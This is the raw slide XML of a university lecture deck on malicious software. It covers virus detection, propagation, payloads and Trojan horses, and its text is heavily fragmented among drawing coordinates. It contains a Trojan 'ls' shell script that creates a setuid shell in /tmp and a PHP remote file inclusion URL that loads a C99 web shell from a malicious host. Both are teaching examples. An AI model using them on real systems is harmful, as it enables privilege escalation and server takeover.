                        <a:rPr sz="3000" spc="-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38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30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programs cannot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deal with viruses not yet analyzed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1485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Detec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Action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Beyon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Spec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359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reat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execution,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infection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as errors and apply fault tolerant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techniques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69926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break program into sequences of nonbranching instructions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Checksu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equence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encryp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esult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61658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processo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recompute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checksum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branch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co-processor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ompares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computed checksum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with stored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If di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ferent,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rror occurred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77355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Detecting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Statistical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-1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Anomalies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416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application had 3 programmers working on it, but statistical analysis shows code from a fourth person—may be from a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="27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rojan horse or virus.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8172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Other attributes: more conditionals than in original; look for identical sequences of bytes not common to any library routine; increases in file size, frequency of writing to executables, etc.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89703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3360"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="821435" y="92964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774953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4443" y="55626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419861" y="157734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336041" y="240792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261365" y="352044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214883" y="464058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27431" y="473202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="528828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27431" y="556260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204977" y="548640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204977" y="723168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233933" y="807720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280415" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382523" y="816102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504443" y="760476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616457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3360"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="858012" h="835152">
                <a:moveTo>
                  <a:pt x="204977" y="723168"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="204977" y="548640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195833" y="696468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204977" y="7231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2715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50114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575309" y="94488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492251" y="19812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380237" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250697" y="28956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167639" y="103632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112013" y="214122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55625" y="390906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="567690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="734568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="919734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73151" y="1040892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157733" y="1179576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5769" y="1217676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="1211572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="640842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465581" y="531114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492251" y="400050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557783" y="288798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216" y="985266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="557783" y="873252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483107" y="762000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="640842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="1211572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521207" y="1171194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575310" y="1086612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585216" y="9852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8709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8555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361950" y="323087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="45719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110489" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="7619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="54101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382" y="109727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54864" y="194309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305562" y="425195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436626" y="555497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520445" y="630935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="657605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="749807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622554" y="713231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49807"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="529590" y="657605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502920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972" y="732281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100584" y="749807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="796289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="861821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120396" y="946404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="992885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="834389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185928" y="796289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241554" y="788669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="778763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="749807"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="660653" h="1104138">
                <a:moveTo>
                  <a:pt x="446532" y="1075182"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="427482" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334518" y="1009649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203454" y="898397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="834389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="992885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8432" y="1104138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446532" y="10751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6135" y="4456176"/>
            <a:ext cx="595121" cy="1383030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="595121" h="1383029">
                <a:moveTo>
                  <a:pt x="483869" y="1225296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="483869" y="1077468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465581" y="1114044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2728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="1225296"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="595121" h="1383029">
                <a:moveTo>
                  <a:pt x="576071" y="176784"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558545" y="55625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529589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049" y="157734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409955" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427481" y="585216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="715518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="919734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="1225296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="1218946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="565404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558545" y="306324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576071" y="176784"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="595121" h="1383029">
                <a:moveTo>
                  <a:pt x="595121" y="1178814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="595121" y="1058418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576071" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520445" y="677418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="565404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="1218946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568451" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595121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7646" cy="1232915"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="977646" h="1232915">
                <a:moveTo>
                  <a:pt x="977646" y="83057"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="912114" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="827532" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724662" y="46481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660654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2598" y="268985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137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="8248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8640" y="315467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651510" y="325373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180" y="352043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707136" y="323562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707136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5632" y="83057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939546" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977646" y="83057"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="977646" h="1232915">
                <a:moveTo>
                  <a:pt x="566166" y="1177289"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="548640" y="1094993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512064" y="982979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371094" y="852677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232410" y="733043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="601979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="398525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="824821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176022" y="890777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268986" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353568" y="1140713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436626" y="1213865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520446" y="1232915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566166" y="1177289"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="977646" h="1232915">
                <a:moveTo>
                  <a:pt x="724662" y="306323"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="707136" y="259841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707136" y="323562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724662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2358" y="2475815"/>
            <a:ext cx="67945" cy="65153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="67945" h="65153">
                <a:moveTo>
                  <a:pt x="67945" y="33450"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65569" y="21295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58077" y="10243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46357" y="2736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31321" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18771" y="3399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8703" y="11484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2113" y="23768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4590" y="50425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13601" y="58811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27017" y="64021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44820" y="65153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56818" y="58132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64951" y="47112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67945" y="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8854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Propagation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Mechanisms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2553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Infection of existing content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viruses that is subsequently spread to other systems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992505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Exploit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software vulnerabilities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by worms or drive-by-downloads to allow the malware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to replicate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marR="820419" indent="-34290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Social engineering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 that convince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users to bypass security mechanisms to install</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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rojans or to respond to phishing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“Spear phishing”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Payload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Actions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Corruption of system or data files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Reversible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encryption of data files.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5151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Theft of service (make the system a zombie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agent part of a botnet)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013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Theft of information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from the system, such as key logging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Hiding its presence on the system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46291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Place the script below in an executable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file called “ls” and trick someone into executing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it.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The shell script for a UNIX system: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21740" marR="3335020">
                        <a:lnSpc>
                          <a:spcPts val="3460"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="25"/>
                        </a:spcBef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c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p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/bin/s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h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/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tmp/.xyzzy chmo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d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u+s,o+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x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/tmp/.xyzzy r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m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./ls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 marL="12217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l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$*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900"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440" marR="34925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  <a:tab pos="6957059" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="-30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ou now have a setuid-to-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them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shell.	If this is the root use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you have root access!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1752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Another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Example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PHP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program contains the following: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4503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include($pag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2400" b="1" spc="-10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'.php');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37"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="8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It is used this way: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27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  <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.vulnerable.website.com/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31"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840">
                        <a:lnSpc>
                          <a:spcPct val="1000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index.php?page=archive</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New"/>
                        <a:cs typeface="Courier New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37"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="85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An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sends this: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500"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="1500"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1669414">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pP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  <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.vulnerable.website.com/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> index.php?page=http://www.malicious. code.com/C99.php?</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New"/>
                        <a:cs typeface="Courier Ne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16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ojan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H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00647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Program with an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overt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i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purpose (known to user) and a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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covert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purpose (unknown to user)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previous script is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rojan horse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Overt purpose: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list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 directory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Covert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purpose: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reate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setuid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shell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Mnemonic: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vert and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pen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overt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oncealed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2589</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>500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Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS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- 4823_11_malicious_software.pptx</dc:title>
  <dc:creator>bbrown</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-19T22:21:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-20T02:42:37Z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